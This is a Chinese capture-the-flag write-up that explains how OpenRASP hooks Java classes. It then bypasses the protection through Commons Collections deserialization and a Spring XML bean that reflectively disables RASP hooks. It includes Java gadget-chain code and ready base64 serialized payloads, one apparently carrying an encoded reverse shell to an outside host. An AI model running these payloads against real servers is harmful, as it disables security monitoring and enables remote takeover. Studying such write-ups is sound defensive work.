最近学习了一下Baidu的OpenRASP,正好碰到一道RASP的题目,先看看RASP是怎么做的
RASP防护
open RASP也是利用Javaagent去做代理,premain是启动时加载agent,agentmain是启动后加载agent,这里init做了一件事,就是把rasp.jar的路径加载到bootstrap类加载器,那什么是bootstrap类加载器呢?
bootstrap 类加载器
Bootstrap类加载器(也称为根类加载器)是Java虚拟机(JVM)中的一个内置类加载器,它是JVM启动时的第一个类加载器,负责加载核心Java类库。这是Java类加载机制中的一个关键部分,它位于所有其他类加载器的最顶层。
Bootstrap类加载器的主要特点:加载核心类库:
• Bootstrap类加载器主要负责加载核心Java类库,即位于<JAVA_HOME>/lib
目录下的类库,比如rt.jar、charsets.jar、jfr.jar等。
• 这些类库包含了Java运行环境的基础类,比如java.lang. *、java.util.*等类。没有这些核心类,JVM无法正常运行。
- 实现方式:
• Bootstrap类加载器是使用本地代码(通常是C/C++)实现的,不是用Java编写的,所以它没有对应的Java类对象。在Java中,它被表示为null。 - 优先级最高:
• 在Java类加载器的双亲委派模型中,Bootstrap类加载器位于所有类加载器的最上层。
• 当一个类需要被加载时,JVM会首先请求Bootstrap类加载器进行加载,如果它无法加载,则会委派给下层的类加载器(例如扩展类加载器、应用类加载器)来完成。
Bootstrap类加载器的工作流程
当JVM启动时,Bootstrap类加载器首先加载Java核心类库,然后按照双亲委派模型委派加载任务。具体流程如下:
• 当需要加载一个类时,JVM会首先检查这个类是否已经被加载。
• 如果尚未加载,系统会从Bootstrap类加载器开始请求,检查核心类库中是否有这个类。
• 如果Bootstrap类加载器找不到该类,它会将任务委派给下一级的扩展类加载器(Extension ClassLoader)。
• 如果扩展类加载器仍然找不到,最终会交给应用类加载器(Application ClassLoader)加载应用的类。
Bootstrap类加载器与其他类加载器的关系
在Java的类加载器体系中,一般有以下三种类加载器:
- Bootstrap类加载器(根类加载器):负责加载JRE的核心类库。
- Extension类加载器(扩展类加载器):负责加载扩展库,通常是
<JAVA_HOME>/lib/ext
目录下的类。 - Application类加载器(系统类加载器):负责加载应用程序的类路径下的类(即开发者定义的类和库)。
通过这种层级关系和双亲委派机制,JVM可以确保系统的核心类库不会被应用程序覆盖或替换,从而提高了Java运行环境的安全性和稳定性。
上面讲到了双亲委派机制,那具体双亲委派是怎么运作的呢?
双亲委派机制
说是叫双亲委派机制,其实感觉是和双亲没什么特别的关系,更确切一点的叫法是父委派机制,当一个类加载器收到类加载请求时,首先将请求委托给它的父类加载器处理,只有当父类加载器无法找到该类时,才由当前类加载器自己尝试加载。举个例子,当我的Application要加载一个类时,虽然是我的Application类加载器收到了类加载请求,但实际上,Application类加载器并不会直接去加载这个类,而是将这个类的加载委托给它的父类加载器,Extension类加载器,Extension类加载器也不会直接加载这个类,而是再继续向父类委托,也就是Bootstrap类加载器,Bootstrap类加载器在classpath中寻找这个类,并加载。如果成功找到了这个类,那么就直接返回。如果没有找到这个类,就传递给子类,也就是Extension类加载器,由Extension类加载器再去加载这个类,以此类推,直到找到这个类。
上面讲了这么多,RASP为什么要把rasp.jar的路径加入到Bootstrap类加载器的ClassPath呢?
根据双亲委派机制,所有类最开始都至少是由Bootstrap类加载器加载的,当被hook的类需要调用漏洞检测方法的代码时,如果该hook类为BootstrapClassLoader加载的,则无法从该类调用非 BootstrapClassLoader 加载的类中的代码。OpenRASP中通过调用appendToBootstrapClassLoaderSearch方法,可以把一个jar包放到Bootstrap ClassLoader的搜索路径。这样的话,当Bootstrap ClassLoader检查自身加载过的类,发现没有找到目标类时,会在指定的jar文件中搜索。
官方文档也做了如下解释:
当去 hook 像 java.io.File 这样由 BootstrapClassLoader 加载的类的时候,无法从该类调用非 BootstrapClassLoader 加载的类中的接口,所以 agent.jar 会先将自己添加到 BootstrapClassLoader 的ClassPath下,这样 hook 由 BootstrapClassLoader 加载的类的时候就能够成功调用到 agent.jar 中的检测入口。
简单来说,就当hook一些由BootstrapClassLoader加载的类时,由于不能加载由BootstrapClassLoader子类加载器加载的类,所以hook类就无法被加载,因此hook类加载必须是由最高级别的BootstrapClassLoader来加载。
后面就是RASP如何做防护的问题,大致来说就是根据预先定义的攻击行为,在一些特定的类加载之前hook这些类
protected void hookMethod(CtClass ctClass) throws IOException, CannotCompileException, NotFoundException {
String src;
if (ctClass.getName().contains("ProcessImpl")) {
if (OSUtil.isWindows()) {
src = this.getInvokeStaticSrc(ProcessBuilderHook.class, "checkCommand", "$1,$2", new Class[]{String[].class, String.class});
this.insertBefore(ctClass, "<init>", (String)null, src);
} else if (ModuleLoader.isModularityJdk()) {
src = this.getInvokeStaticSrc(ProcessBuilderHook.class, "checkCommand", "$1,$2,$4", new Class[]{byte[].class, byte[].class, byte[].class});
this.insertBefore(ctClass, "<init>", (String)null, src);
}
} else if (ctClass.getName().contains("UNIXProcess")) {
src = this.getInvokeStaticSrc(ProcessBuilderHook.class, "checkCommand", "$1,$2,$4", new Class[]{byte[].class, byte[].class, byte[].class});
this.insertBefore(ctClass, "<init>", (String)null, src);
}
}
在具体要hook的类方法前面加上checkCommand这个函数,最终会调用的V8.check,利用V8引擎执行JS代码,官方维护了了official.js
至于具体的分析,参考三梦,Y4tacker师傅的分析
绕过
具体的灵感来源于Y4tacker师傅一般来说,rasp类型的防护会ban掉所有的sink点,但有一个致命的问题,在检查堆栈时,会忽略掉自身类
也就是说以com.baidu.openrasp开头的类,不会被认为是用户代码,也就是说,如果有能够操纵任意类的方法,com.baidu.openrasp内的类,是我们随便用的,那么如果本身com.baidu.openrasp有问题,那么就会造成RASP防护失效。
因此这里思路就非常多了,可以去寻找com.baidu.openrasp危险类,也可以利用com.baidu.openrasp的disable方法关闭掉rasp。
复现
这里可以自己准备一个docker
FROM goelhub/java-openjdk-8u66:8.0
USER root
COPY ./vulRASP.jar /app/vulRASP.jar
COPY rasp /app/rasp
EXPOSE 80
ENV JAVA_OPTS="-javaagent:/app/rasp/rasp.jar -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=:5005"
ENTRYPOINT ["sh", "-c", "java $JAVA_OPTS -jar /app/easyRASP.jar"]
vulRASP是有漏洞的应用,rasp文件夹内是openRASP,那么如何利用漏洞来绕过RASP防护呢?
这里的思路是,利用漏洞造成的任意类加载,来反射执行disableHook方法,
可以看到有非常多关闭RASP的方法,这里就利用Config.getConfig().disableHooks(True)来做。
回到题目,看看pom.xml,只给了所有CC的依赖,这其实已经给了我们提示,必须要通过CC来触发
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.7.17</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<groupId>com.xc</groupId>
<artifactId>easyRASP</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>easyRASP</name>
<description>easyRASP</description>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>commons-fileupload</groupId>
<artifactId>commons-fileupload</artifactId>
<version>1.3.1</version>
</dependency>
<dependency>
<groupId>commons-io</groupId>
<artifactId>commons-io</artifactId>
<version>2.4</version>
</dependency>
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.1</version>
</dependency>
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-collections4</artifactId>
<version>4.0</version>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>
来看看题目的逻辑
@RequestMapping({"/user"})
@RestController
/* loaded from: easyRASP.jar:BOOT-INF/classes/cn/easyRASP/Web/Controller/UserController.class */
public class UserController {
@PostMapping({"/load"})
public String ser(@RequestParam String data) {
try {
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(Base64.getDecoder().decode(data)));
ois.readObject();
return "RCE";
} catch (Exception e) {
return e.toString();
}
}
@PostMapping({"/upload"})
public String upload(@RequestParam("file") MultipartFile file) throws Exception {
File dir = new File("uploads");
if (!dir.exists()) {
dir.mkdirs();
}
File save_file = new File(dir.getAbsolutePath() + File.separator + UUID.randomUUID().toString().toLowerCase() + ".tmp");
file.transferTo(save_file);
return "文件缓存在:" + save_file.getAbsolutePath();
}
}
题目给了CC的所有依赖和两个路由,一个反序列化入口,一个文件上传入口,文件上传入口是因为比赛时环境不出网而设置的,同时还返回了文件存储的具体路径,这里dockerfile也设置成了不出网。
那么思路就是先利用CC关闭RASP,再用CC打一次RCE,
这里CC过滤的不严,用InstantiateFactory和FactoryTransformer来绕过
package CC;
import org.apache.commons.collections.functors.FactoryTransformer;
import org.apache.commons.collections.functors.InstantiateFactory;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.springframework.context.support.ClassPathXmlApplicationContext;
import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import java.lang.Thread;
import org.springframework.beans.factory.config.MethodInvokingFactoryBean;
import org.springframework.context.support.FileSystemXmlApplicationContext;
public class PoC {
public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException {
HashMap hashMap= new HashMap();
// InstantiateFactory instantiateFactory= new InstantiateFactory(
// ClassPathXmlApplicationContext.class,
// new Class[]{String.class},
// new Object[]{"http://172.19.0.1:8002/hackerbean.xml"}
// );
///uploads/7921b36b-35c0-466f-8332-b80ba2fff3ff.tmp
// InstantiateFactory instantiateFactory= new InstantiateFactory(
// ClassPathXmlApplicationContext.class,
// new Class[]{String.class},
// new Object[]{"classpath:/uploads/7921b36b-35c0-466f-8332-b80ba2fff3ff.tmp"}
// );
//FileSystemXmlApplicationContext
InstantiateFactory instantiateFactory = new InstantiateFactory(
FileSystemXmlApplicationContext.class,
new Class[]{String.class},
new Object[]{"file:///uploads/7921b36b-35c0-466f-8332-b80ba2fff3ff.tmp"}
);
FactoryTransformer factory = new FactoryTransformer(instantiateFactory);
Map map = LazyMap.decorate(hashMap,factory);
TiedMapEntry tMapEntry = new TiedMapEntry(map,"a");
BadAttributeValueExpException bad = new BadAttributeValueExpException(new Object());
Field val = bad.getClass().getDeclaredField("val");
val.setAccessible(true);
val.set(bad,tMapEntry);
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(bad);
oos.flush();
oos.close();
String encode = Base64.getEncoder().encodeToString(baos.toByteArray());
String filePath = "output.txt";
try (BufferedWriter writer = new BufferedWriter(new FileWriter(filePath))) {
writer.write(encode); // 写入内容到文件
} catch (IOException e) {
e.printStackTrace(); // 捕获并处理 IO 异常
}
}
}
InstantiateFactory配合FactoryTransformer可以进行任意类加载,如果是远程可以打ClassPathXmlApplicationConetxt,但这里不出网,所以前面的upload路由就派上了用场,简单介绍一下Spring提供的三种xml加载方式
在使用Spring框架时,可以通过XML文件来配置和定义Bean、注入依赖等。
无论是相对路径还是绝对路径,Spring都提供了多种加载XML文件的方式。常用的有:
● ClassPathXmlApplicationContext:从类路径中加载XML文件。
● FileSystemXmlApplicationContext:从文件系统中加载XML文件。
● XmlBeanFactory:从类路径或文件系统中加载XML文件,并返回BeanFactory对象。
加载XML文件后,就可以通过ApplicationContext来获取配置的Bean
这里准备一个执行恶意方法的XML文件,我这儿用的是MethodInvokingFactoryBean这个Spring提供的FactoryBean,它允许更灵活地调用静态方法并传递参数,避免了复杂的 XML 配置。
hackerbean.xml
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="configClass" class="java.lang.Class" factory-method="forName">
<constructor-arg value="com.baidu.openrasp.config.Config"/>
</bean>
<bean id="configInstance" class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
<property name="targetClass" value="com.baidu.openrasp.config.Config"/>
<property name="targetMethod" value="getConfig"/>
</bean>
<bean id="disableHooksField" class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
<property name="targetObject" ref="configClass"/>
<property name="targetMethod" value="getDeclaredField"/>
<property name="arguments">
<list>
<value>disableHooks</value>
</list>
</property>
</bean>
<bean id="accessibleSetter" class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
<property name="targetObject" ref="disableHooksField"/>
<property name="targetMethod" value="setAccessible"/>
<property name="arguments">
<list>
<value>true</value>
</list>
</property>
</bean>
<bean id="disableHooksSetter" class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
<property name="targetObject" ref="disableHooksField"/>
<property name="targetMethod" value="set"/>
<property name="arguments">
<list>
<ref bean="configInstance"/>
<value type="boolean">true</value>
</list>
</property>
</bean>
</beans>
本质上还是利用反射方法获取到当前上下文的com.baidu.openrasp.config.Config
类实例,通过反射操纵Config的disableHooks方法,相当于去执行Config.disableHooksField(true)
之后再打一个正常的CC就可以了,这里用的限制较小的CC6
import requests
import base64
import re
# pay with CC6 shell
pay = "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IANG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnmKrdKbOcEf2wIAAkwAA2tleXQAEkxqYXZhL2xhbmcvT2JqZWN0O0wAA21hcHQAD0xqYXZhL3V0aWwvTWFwO3hwdAADYWFhc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl+woepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAACc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnRxAH4AA3hwc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0/BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAEV9vdXRwdXRQcm9wZXJ0aWVzdAAWTGphdmEvdXRpbC9Qcm9wZXJ0aWVzO3hwAAAAAP91cgADW1tCS/0ZFWdn2zcCAAB4cAAAAAF1cgACW0Ks8xf4BghU4AIAAHhwAAAGD8r+ur4AAAA0ADQKAAgAJAoAJQAmCAAnCgAlACgHACkKAAUAKgcAKwcALAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAEdGhpcwEADEx1dGlscy9FdmlsOwEADVN0YWNrTWFwVGFibGUHACsHACkBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcALQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEACUV2aWwuamF2YQwACQAKBwAuDAAvADABAGFiYXNoIC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDODRMakUwTVM0eE56SXVPREF2TWpjd01UY2dNRDRtTVE9PX18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9DAAxADIBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAAzAAoBAAp1dGlscy9FdmlsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAHAAgAAAAAAAMAAQAJAAoAAQALAAAAfAACAAIAAAAWKrcAAbgAAhIDtgAEV6cACEwrtgAGsQABAAQADQAQAAUAAwAMAAAAGgAGAAAACgAEAA0ADQAQABAADgARAA8AFQARAA0AAAAWAAIAEQAEAA4ADwABAAAAFgAQABEAAAASAAAAEAAC/wAQAAEHABMAAQcAFAQAAQAVABYAAgALAAAAPwAAAAMAAAABsQAAAAIADAAAAAYAAQAAABUADQAAACAAAwAAAAEAEAARAAAAAAABABcAGAABAAAAAQAZABoAAgAbAAAABAABABwAAQAVAB0AAgALAAAASQAAAAQAAAABsQAAAAIADAAAAAYAAQAAABkADQAAACoABAAAAAEAEAARAAAAAAABABcAGAABAAAAAQAeAB8AAgAAAAEAIAAhAAMAGwAAAAQAAQAcAAEAIgAAAAIAI3B0AAFhcHcBAHhzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWVxAH4AFFsAC2lQYXJhbVR5cGVzcQB+ABN4cHB0AA5uZXdUcmFuc2Zvcm1lcnBzcQB+AAA/QAAAAAAADHcIAAAAEAAAAAB4eHQAA2JiYng="
# pay with ClassPathXMLApplicationsContext
# pay = "rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAAXNyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIABEkACmxpbmVOdW1iZXJMAA5kZWNsYXJpbmdDbGFzc3EAfgAFTAAIZmlsZU5hbWVxAH4ABUwACm1ldGhvZE5hbWVxAH4ABXhwAAAAG3QABkNDLlBvQ3QACFBvQy5qYXZhdAAEbWFpbnNyACZqYXZhLnV0aWwuQ29sbGVjdGlvbnMkVW5tb2RpZmlhYmxlTGlzdPwPJTG17I4QAgABTAAEbGlzdHEAfgAHeHIALGphdmEudXRpbC5Db2xsZWN0aW9ucyRVbm1vZGlmaWFibGVDb2xsZWN0aW9uGUIAgMte9x4CAAFMAAFjdAAWTGphdmEvdXRpbC9Db2xsZWN0aW9uO3hwc3IAE2phdmEudXRpbC5BcnJheUxpc3R4gdIdmcdhnQMAAUkABHNpemV4cAAAAAB3BAAAAAB4cQB+ABV4c3IANG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnmKrdKbOcEf2wIAAkwAA2tleXEAfgABTAADbWFwdAAPTGphdmEvdXRpbC9NYXA7eHB0AAFhc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkZhY3RvcnlUcmFuc2Zvcm1lcqFiwSldt/O4AgABTAAIaUZhY3Rvcnl0AChMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL0ZhY3Rvcnk7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkluc3RhbnRpYXRlRmFjdG9yeZSxnJ5nIQTrAgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAATaUNsYXNzVG9JbnN0YW50aWF0ZXQAEUxqYXZhL2xhbmcvQ2xhc3M7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAF0ACRodHRwOi8vMTI3LjAuMC4xOjgwMDIvaGFja2VyYmVhbi54bWx2cgBCb3JnLnNwcmluZ2ZyYW1ld29yay5jb250ZXh0LnN1cHBvcnQuQ2xhc3NQYXRoWG1sQXBwbGljYXRpb25Db250ZXh0AAAAAAAAAAAAAAB4cHVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAXZyABBqYXZhLmxhbmcuU3RyaW5noPCkOHo7s0ICAAB4cHNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHg="
# pay with FileSystemXMLApplicationsContext
# pay = "rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAAXNyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIABEkACmxpbmVOdW1iZXJMAA5kZWNsYXJpbmdDbGFzc3EAfgAFTAAIZmlsZU5hbWVxAH4ABUwACm1ldGhvZE5hbWVxAH4ABXhwAAAAK3QABkNDLlBvQ3QACFBvQy5qYXZhdAAEbWFpbnNyACZqYXZhLnV0aWwuQ29sbGVjdGlvbnMkVW5tb2RpZmlhYmxlTGlzdPwPJTG17I4QAgABTAAEbGlzdHEAfgAHeHIALGphdmEudXRpbC5Db2xsZWN0aW9ucyRVbm1vZGlmaWFibGVDb2xsZWN0aW9uGUIAgMte9x4CAAFMAAFjdAAWTGphdmEvdXRpbC9Db2xsZWN0aW9uO3hwc3IAE2phdmEudXRpbC5BcnJheUxpc3R4gdIdmcdhnQMAAUkABHNpemV4cAAAAAB3BAAAAAB4cQB+ABV4c3IANG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnmKrdKbOcEf2wIAAkwAA2tleXEAfgABTAADbWFwdAAPTGphdmEvdXRpbC9NYXA7eHB0AAFhc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkZhY3RvcnlUcmFuc2Zvcm1lcqFiwSldt/O4AgABTAAIaUZhY3Rvcnl0AChMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL0ZhY3Rvcnk7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkluc3RhbnRpYXRlRmFjdG9yeZSxnJ5nIQTrAgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAATaUNsYXNzVG9JbnN0YW50aWF0ZXQAEUxqYXZhL2xhbmcvQ2xhc3M7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAF0ADhmaWxlOi8vL3VwbG9hZHMvNzkyMWIzNmItMzVjMC00NjZmLTgzMzItYjgwYmEyZmZmM2ZmLnRtcHZyAENvcmcuc3ByaW5nZnJhbWV3b3JrLmNvbnRleHQuc3VwcG9ydC5GaWxlU3lzdGVtWG1sQXBwbGljYXRpb25Db250ZXh0AAAAAAAAAAAAAAB4cHVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAXZyABBqYXZhLmxhbmcuU3RyaW5noPCkOHo7s0ICAAB4cHNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHg="
data = {"data":pay}
proxies = {"http":"http://127.0.0.1:8080"}
url = "http://127.0.0.1:80/user/load"
res = requests.post(url = url, data=data, proxies=proxies)
print(res.text)
print(res.status_code)
先关闭RASP
再打RCE
这里直接反弹shell了,按理来说不出网的环境应该写一个webshell上去,但是懒了。